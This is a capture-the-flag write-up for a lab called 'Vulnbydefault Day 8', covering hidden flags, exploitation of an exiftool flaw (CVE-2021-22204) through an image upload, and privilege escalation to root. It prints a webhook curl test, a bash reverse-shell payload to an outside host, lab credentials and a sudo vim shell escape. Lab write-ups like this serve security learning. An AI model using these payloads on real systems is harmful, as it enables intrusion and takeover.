Day 8 Challenge Writeups



Vulnbydefault Day 8 Writeup
On opening the site url we have given following interface

lets register a user and login

we have got following dashboard

Lets upload a image file

There is also download button

Flag 1
Lets check the source of dashboard

Lets decode it on this site

Flag 2
Lets check the /robots.txt

Base64 decode : L2c7c88f0f265FG673b76a5dceA{c74be18597}
Lets check transpostion cipher go this site

Flag 3
Lets upload file on dashboard

Lets decode it

RCE
In exif out of the application we can check the exiftool version

Let search for this version online


Lets use webhook

Lets check for rce
python3 exploit-CVE-2021-22204.py -c 'curl <webhook-url>'

Lets upload it on dashboard
we have got request on our webhook

This confirms that we have rce
Lets use reverse shell payload
bash -c "bash -i >& /dev/tcp/ngrok/port 0>&1

python3 exploit-CVE-2021-22204.py -c 'echo <base64-encoded-payload> | base64 -d | bash'

Lets upload again
we have got reverse shell



Flag 4


Lets check this developer hash on hashes.com

Flag 5
Lets use developer password
developer:marvelous

Flag 6
Lets check the mail of developer user

Lets check for sudo privileges for developer user

Lets check .bash_history file

we got password of manager user
user.txt
Lets use the manager user password
manager:y0uG0tM3

root.txt
Lets check the sudo privileges of manager user

Alright we can use sudo on vim
Use this site

sudo vim -c ':!/bin/sh'
